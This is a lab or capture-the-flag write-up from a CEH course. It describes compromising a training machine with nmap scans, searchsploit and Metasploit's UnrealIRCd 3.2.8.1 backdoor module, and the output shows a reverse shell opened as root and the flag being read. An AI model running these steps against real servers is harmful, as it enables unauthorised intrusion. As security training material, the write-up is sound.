This was one of the first machines done during the CEH course. The virtual machine available in my classes was a copy of another existent in the lab so, when I finally got access to the lab, I merely replicated the actions done in the VM and this let the description of the machine in the lab pass unnoticed. Had I done a decent job during the enumeration phase, I wouldn’t have lost time looking for a machine with the resources later needed. Were this be the OSCP test I’d be in trouble.

So one of the lessons learned here was: information gathering, footprinting and scanning must be really well done as it saves time in the future.

Maq106 – MÁQUINA
Descrição: Procure descobrir o(s) ponto(s) de vulnerabilidade(s) desta máquina e capture a flag!
A máquina pode esconder segredos interessantes para comprometer outras máquinas no Laboratório de Pentest

Let’s start seeing what are we dealing with. I have an IP address and nothing else.
I’ll look for the running OS and for any open ports.

root@parrot:~# nmap -O -sV
Nmap scan report for
Host is up (0.0071s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: irc.maq106.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

Good enough, it’s a Debian and we have a few known services running there. The one odd here is this irc. So is the one I’ll start poking.

root@parrot:~# locate *.nse | grep irc

A script for the same irc server we have. Let’s see what this irc-unrealircd-backdoor.nse can show us.

root@parrot:~# nmap -p6667 --script irc-unrealircd-backdoor.nse
Nmap scan report for
Host is up (0.0075s latency).
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

Right, the service is vulnerable, just let me check the irc service version before proceeding.

root@parrot:~# nmap -p6667 --script irc-info.nse
Nmap scan report for
Host is up (0.039s latency).
6667/tcp open irc
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.maq106.com
| version: Unreal3.2.8.1. irc.maq106.com
| uptime: 1 days, 5:14:01
| source ident: nmap
| source host: 5970F2CA.18AECCC8.1C965CCA.IP
|_ error: Closing Link: ijfqofavr[] (Quit: ijfqofavr)
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

We already had the service name, now we have the version too. Let’s check if we already have an exploit ready for this version.

root@parrot:~# searchsploit unrealirc
------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
------------------------------------------------------------- ----------------------------------------

I’ll cut the chase straight to the Metasploit, pick the script shown above and set it’s options.

root@parrot:~# service postgresql start
root@parrot:~# msfconsole
msf > search unrealirc
Matching Modules
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD Backdoor Command Execution
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST

Ready to run the exploit.

msf > exploit
[*] Started reverse TCP double handler on
[*] - Connected to
:irc.maq106.com NOTICE AUTH :*** Looking up your hostname...
:irc.maq106.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ealfLbzJRfkl7r18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ealfLbzJRfkl7r18\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2018-04-24 09:21:40 -0300
cat /root/flag.txt

The exploit finished and I typed this whoami to check the prompt. I am root. I finished reading the flag.txt content (it’s not the real one here) but the machine is owned. You can do anything now, like seeing the other users available and their encrypted passwords or maybe even other networks this machine can reach…

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.